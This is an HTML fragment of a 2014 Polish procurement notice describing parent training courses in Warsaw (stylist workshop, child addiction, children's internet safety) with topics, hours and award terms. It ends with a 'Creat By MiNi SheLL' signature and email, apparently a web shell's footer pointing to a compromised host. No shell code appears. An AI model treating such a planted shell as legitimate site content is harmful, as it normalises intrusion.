Zajęcia ze stylistą/wizażystą powinny obejmować co najmniej 1 dzień zajęć (6 godzin dla każdej grupy). Aby zapewnić indywidualne podejście do każdego uczestnika i możliwość udzielenia każdemu porady zajęcia te musi prowadzić co najmniej 2 wizażystów/stylistów w każdej grupie.
Zajęcia odbędą się w sali zapewnionej przez Zamawiającego (ul. Wincentego 87 w Warszawie). Zamawiający zapewni wyposażenie sali w rzutnik multimedialny oraz tablicę. Zapewnienie uczestnikom serwisu kawowego (kawa, herbata, soki, ciasteczka oraz naczynia do ich dystrybucji) leży po stronie Wykonawcy. Wykonawca zapewni też materiały do zajęć warsztatowych ze stylistą/wizażystą (kosmetyki, lustra itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenie: Jak rozpoznać i radzić sobie z uzależnieniem dzieci (narkotyki, komputery, alkohol).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 25
ilość grup: 2
ilość godzin szkolenia-12: (1 dzień *2 grupy).
Szkolenie odbędzie się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i  zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.
Celem szkolenia jest podniesienie poziomu wiedzy dotyczącej diagnozowania uzależnień u dzieci oraz konsekwencji i sposobów radzenia sobie z uzależnieniami dzieci i młodzieży.
Program szkolenia powinien zawierać następujące tematy:
-Rodzaje uzależnień - omówienie (alkoholizm, narkomania, lekomania, hazard, siecioholoizm, seksoholizm, jedzenie kompulsywne)
-Fazy i mechanizmy uzależnień
-Konsekwencje uzależnień
-Rozpoznawanie uzależnień u dzieci - co powinno zaniepokoić rodzica?
-Szukanie diagnostyki i pomocy specjalistycznej
-Motywowanie dziecka uzależnionego do podjęcia leczenia.
-Wspieranie dziecka w czasie walki z uzależnieniem
-Współuzależnienie
Zajęcia odbędą się w sali zapewnionej przez Zamawiającego (ul. Wincentego 87 w Warszawie). Zamawiający zapewni wyposażenie Sali w rzutnik multimedialny oraz tablicę. Zapewnienie uczestnikom serwisu kawowego (kawa, herbata, soki, ciasteczka oraz naczynia do ich dystrybucji) leży po stronie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenie: Bezpieczeństwo dzieci w Internecie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ilość osób: 15
ilość grup: 1
ilość godzin szkolenia-6: (1 dzień * 6 godzin).
Szkolenie odbędzie się w dni powszednie (między poniedziałkiem a piątkiem), zajęcia rozpoczną się nie wcześniej niż o godzinie 9.00 i  zakończą nie później niż o godzinie 15.00. Szczegółowy termin rozpoczęcia i zakończenia warsztatów zostanie uzgodniony z Wykonawcą przed podpisaniem umowy przy czym preferencje Zamawiającego odnośnie terminów są wiążące dla Wykonawcy.
Celem szkolenia jest podniesienie poziomu wiedzy rodziców dotyczącej wspierania dzieci 
w bezpiecznym poruszaniu się w Internecie i przeciwdziałanie przestępstwom w sieci.
Program szkolenia powinien zawierać następujące tematy:
-Jak rozmawiać i zapoznać dziecko z komputerem
-Internet, jako narzędzie nauki, pracy, rozrywki i komunikacji
-Gry komputerowe - uzależnienie czy rozwijanie wyobraźni?
-Jak rozmawiać z dziećmi na temat zawierania znajomości przez Internet
-Gdzie i jak zgłaszać szkodliwe treści dla dzieci
-Jak podjąć podstawowe środki ostrożności na komputerze (hasła, blokady, programy ograniczające dostęp do komputera, kontrola rodzicielska)
-Zapoznanie dziecka z Netykietą
-Potencjalne zagrożenia w sieci
-Jak unikać internetowych oszustw
-Jak bezpiecznie posługiwać się portalami społecznościowymi
Zajęcia odbędą się w sali zapewnionej przez Zamawiającego (ul. Wincentego 87 w Warszawie). Zamawiający zapewni wyposażenie sali w rzutnik multimedialny oraz tablicę. Zapewnienie uczestnikom serwisu kawowego (kawa, herbata, soki, ciasteczka oraz naczynia do ich dystrybucji) leży po stronie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com